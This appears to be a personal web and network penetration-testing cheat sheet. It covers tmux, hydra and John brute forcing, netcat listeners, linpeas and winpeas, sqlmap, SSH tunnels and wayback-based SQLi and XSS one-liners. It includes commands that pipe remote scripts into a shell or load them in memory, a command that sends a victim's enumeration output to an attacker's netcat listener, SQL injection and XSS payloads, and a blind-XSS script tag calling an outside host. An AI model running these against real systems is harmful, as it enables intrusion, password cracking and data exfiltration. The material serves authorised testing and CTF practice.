General Info
Welcome
Hi, this page is because I can’t for the life of me remember my options when I am trying to web-test.
email: ryushe@bugcrowdninja-demon.com
General tips
flask -> usually jinja2
2> /dev/null
- hides error output
Tmux
re-attach session:
tmux a
Attach file session:
tmux -S <name>
Rename session:
prefix + $
Pane -> Window:
prefix + !
Move pane left/right:
prefix + { or }
Save / restore:
prefix + s / r
Brute-Force
ffuf
cme - SMB brute force tool
John the ripper - cracking tool
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt
hydra:
hydra -l usr -P pass.txt ssh://www.example.com
hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder -s 8080 http-post-form "/login:j_username=jennifer&j_password=^PASS^&from=&Submit=:Invalid username or password"
Listeners
wireshark - self explanitory
nc - net cat is a good listner
- Example usage: nc -lvnp
Wordlists
/usr/share/wordlists/
- /seclists
Network
python http.server
- v3 python
- Spawns python server
netexec:
- Network service exploitation tool
- Helps automate assessing large networks
Linpeas & Winpeas
Linpeas:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"
filter to host machine:
nc -lvnp 9002 | tee linpeas.out
# host
curl $ip:8000/linpeas.sh | sh | nc $ip 9002
# victim
Winpeas:
url =
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
LINPEAS VIEWING
less -r <outputfile>
- color codes everythign properly
Other
Pspy - inspect application
powershell -c
- allows for powershell command
Exiftool - analyzing metadata
Refrance links
tbd
SQL
' or 1=1 -- -
SQL Map
sqlmap -r request.txt --dbms=<db> --dump
- dumps off request to site, attempts to do a sqli
SSH
chmod 600 <key>
ssh -L <port>:website:80 <user>@myserver
- port forwarding, allowing access to website from myserver
ssh -R <port>:website:80 <user>@myserver
- reverse forwarding, allowing others to view your traffic
Sockets
ss -tulpn
(tcp, udp, listenting only, process using socket, dont respolve service names)
Post exploit
Exiftool - analyzing meta data
look for weird configs
linpeas.sh big
curl $ip:1111/linpeas.sh
find / -perm -u=s -type f 2>/dev/null
- suid bit finder
One liners
Sqlmap from wayback:
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
XSS from wayback:
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
XSS in x-forward header:
findomain -t http://TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For"
My site test urls:
xss:
https://mochungusxd.web.app/payloads/svgxss.html
Open-Redirect:
https://mochungusxd.web.app/